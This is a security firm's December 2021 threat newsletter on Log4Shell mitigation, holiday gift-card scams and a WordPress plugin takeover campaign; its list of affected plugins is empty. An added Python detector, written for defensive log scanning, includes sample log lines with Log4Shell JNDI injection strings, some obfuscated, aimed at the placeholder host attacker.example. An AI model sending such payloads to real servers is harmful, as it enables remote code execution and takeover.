A Month In Breaches: December


Part of protecting our clients is also promoting good security practices and raising awareness of current security trends. We hope this will bolster your overall understanding of cybersecurity attacks across the globe. This is an initiative by our Security Operations Centre team who have their eyes on the prize 24/7 and are proactively observing breaches and critical security trends. We observed the rising trends in cyber attacks and system compromise in the last month of 2021.  Please see below for mitigation strategies recommended by CTRL Group.

Log4Shell Vulnerability 

Log4Shell is a software vulnerability in Apache Log4j, a highly used open-source logging framework that allows software developers to log data within their applications. Since December 10, when it was published, it is estimated that hundreds of millions of devices were affected. The vulnerability is officially titled CVE-2021-44228 and received the highest Common Vulnerability Scoring System (CVSS) score – 10/10, with experts describing it as “arguably the most severe vulnerability ever”. 

The vulnerability allows an attacker to remotely take control of internet-connected devices running any version of the Log4j library prior to 2.17, which was released on December 17 after two earlier post-disclosure releases either only partially fixed the issue or introduced new vulnerabilities. The library is incredibly popular; experts estimate that nearly half of all corporate networks worldwide have been actively probed and that the vulnerability affected 93% of enterprise cloud environments.  

The vulnerability is considered easy to exploit, which makes it even more dangerous. Because of that ease of exploitation, it is still being actively exploited against countless organisations that have yet to patch every vulnerable asset. Nefarious activities conducted by hackers against victims using this vulnerability include ransomware attacks, cryptocurrency mining, botnet creation, sending spam, establishing backdoors and other illegal activities. Microsoft stated it has seen evidence of the vulnerability being used by multiple nation-state threat actors originating from China, Iran, North Korea and Turkey. 

Can you prevent this attack?  

Yes, you can mitigate this risk, using the following recommendations:  

  1. If you haven’t already, make sure all of your vulnerable assets are patched to Log4j version 2.17, including any internally developed software that uses the log4j library. 
  2. If, for any reason, patching is not possible, you should apply the following steps: 
    • In releases 2.10 and higher, set either the system property “log4j2.formatMsgNoLookups” or the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to true.   
    • For releases from 2.0-beta9 to 2.10.0, remove the “JndiLookup” class from the classpath: “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”.  
  3. Use the Huntress Labs Log4Shell vulnerability tester to determine whether your applications are vulnerable to this threat. 
  4. Remember that patching only mitigates attacks from that point on, while attackers may have breached your network prior to it. CTRL Group advises the following steps: 
    • Scan your environment for vulnerable machines. 
    • Be on the lookout for any unauthorised configuration changes. 
    • Search for odd or abnormal traffic patterns that might imply an attacker is inside your network – specifically variations of the phrase “${jndi:”, which precedes the attacker’s internet address. If this phrase is found on your network, CTRL Group advises initiating a full scan of the compromised network.
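As an added detection example, not part of the original newsletter, the following Python scanner runs over constructed sample web-server log lines, folds the common Log4j lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) back to plain text, and flags every line that then contains “${jndi:”. The log lines, the source addresses and the “attacker.example” host are constructed placeholders.

```python
import re

# Constructed sample access-log lines (not from the original page);
# "attacker.example" is a placeholder for the attacker-controlled host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:04 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://x.attacker.example}"',
    '10.0.0.7 - - [12/Dec/2021:10:01:06 +0000] "GET /price?x=${value} HTTP/1.1" 200 88',  # harmless template text
]

# Innermost lookups that fold to plain text:
#   ${lower:X} / ${upper:X}  -> X
#   ${anything:-DEFAULT}     -> DEFAULT   (covers the empty-key form ${::-X})
_CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
# What we are really looking for once the obfuscation is gone.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse obfuscating lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        folded = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        folded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains ${jndi: after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, source_ip, normalized_line) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_log4shell_probe(line):
            hits.append((n, line.split(' ', 1)[0], normalize(line)))
    return hits


if __name__ == "__main__":
    for n, ip, norm in scan(SAMPLE_LOGS):
        print(f"line {n} from {ip}: {norm}")
```

A hit only shows that a probe reached the host; whether it succeeded still needs the full scan the newsletter recommends.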

 

‘Tis the Season to… Be Wary of Scams

The holiday season is a great time to unwind and spend some much-needed relaxation time with your loved ones. That is, if you’re not a hacker trying to scam people out of their hard-earned money. 

Christmas time is one of the busiest times of the year not only for retail and logistics businesses but also for hackers, who exploit the surge in shopping to siphon off credit card details, bank credentials or personal information via gift card and other shopping-related scams. The volume of online shopping this year is expected to be the largest ever – global online spending during the holiday season is expected to increase by 11% to $910 billion. With store closures and increases in online shopping, along with limited product availability and concerns about shipping, cybercriminals are putting in the effort to claim a piece of the pie. 

The US Federal Trade Commission (FTC) said Americans reported losing $148 million to gift card scams during the first nine months of 2021, a significant increase compared to 2020. Of that, $35m was lost to frauds using Target gift cards and $17m to scams involving Google Play gift cards, followed by Apple ($16m), eBay ($10m) and Walmart ($6m). In Australia, consumers have already lost about $12.9 million to online shopping scams so far this year. 

Security companies observed gift card balance lookups quadruple, which indicates that scammers are using bots to identify and steal gift card balances. Stolen gift cards typically get spent very fast, so many people may end up getting zero-balance gift cards as presents. 

“Bad bots” continue to be a major threat to online retail businesses. The level of sophistication being witnessed is at an all-time high, as cyber criminals increase their collaboration and improve their ways of conducting fraud and generating profits through the use of automation. 

Recommended Mitigation Actions 

How can you help protect yourself from these holiday season scams and subsequent attacks? 

  1. Do not click a link or open a file that promises gift cards or sales that come from an unknown origin. Use official websites to find real deals. 
  2. Do not provide your details (passwords, bank details etc.) to anyone in exchange for a gift card. 
  3. If you receive an offer that sounds too good to be true, it usually is. Explore further online to check whether or not it is a scam. 
  4. Always prefer to use secure payment options that come with protection, such as PayPal or a credit card. If a seller asks you to pay via gift cards only, do not deal with them. 
  5. Do not enter your credit card details on suspicious websites. If you don’t see the lock icon and the ‘https’ address, or if you see any other suspicious signs, it is better to be safe than sorry. 
  6. If you received a gift card you did not expect, be suspicious; verify its validity by browsing to the official website of its store/service (by searching for it rather than clicking a link) and entering its details there. 
  7. Advertisements on social media websites also often lead to fake offers, bogus websites and other scams. Think before you click. 
  8. When you are accessing or sharing confidential information (credit card, bank login details, etc.), do not use a public Wi-Fi network. 

 

Massive Attack Against 1.6 million WordPress Sites Underway 

Cyber security experts have recently detected a massive jump in the number of attacks launched against WordPress websites, affecting up to 1.6 million different victims, with the attacks originating from 16,000 different IP addresses. 

Based on the findings, the threat actors behind these attacks have mostly targeted four specific plugins that share a similar exploitable vulnerability. Some of the plugins had this vulnerability fixed years ago, some as recently as last week, and some still have no available patch as of today. 

In most attacks observed, the threat actors change the targeted website’s settings so that the default role for new users is administrator. This gives them full control of the website, effectively taking it over. 

To protect yourself from these vulnerabilities, ensure that your website is running a version higher than any of the ones listed for the specific plugins. These are the affected plugins and the versions they must be updated to in order to mitigate this attack campaign: 

 

Recommended Mitigation Actions 

To check if your website has been compromised, CTRL Group recommends reviewing all user accounts for any changes, and also looking for any additions or plugins you did not add and removing them. 

Other more general WordPress security tips are: 

  1. Change the security settings on your WordPress website so it limits access to internal libraries to authorised parties only, and also make sure it does not index your internal libraries on search engines such as Google. CTRL Group has observed many website admins that forget to do this, which leaves their private information easily accessible to anyone via a simple online search. 
  2. Review your website’s settings and change the new user default role to the lowest permission possible. 
  3. Keep the number of plugins on your WordPress website to a minimum, as this greatly reduces the chances of being hacked. 
  4. Update your plugins and themes regularly; if you use one that contains vulnerabilities and has no available patch, uninstall it. 
  5. Remember that updating plugins and themes only mitigates attacks from that point on, while attackers may have already breached your website. If you suspect you have been breached, contact a cyber security company to assess your situation. 

 

– CTRL GROUP SECURITY OPERATIONS CENTRE Cyber Threat Intelligence Analyst, Yonatan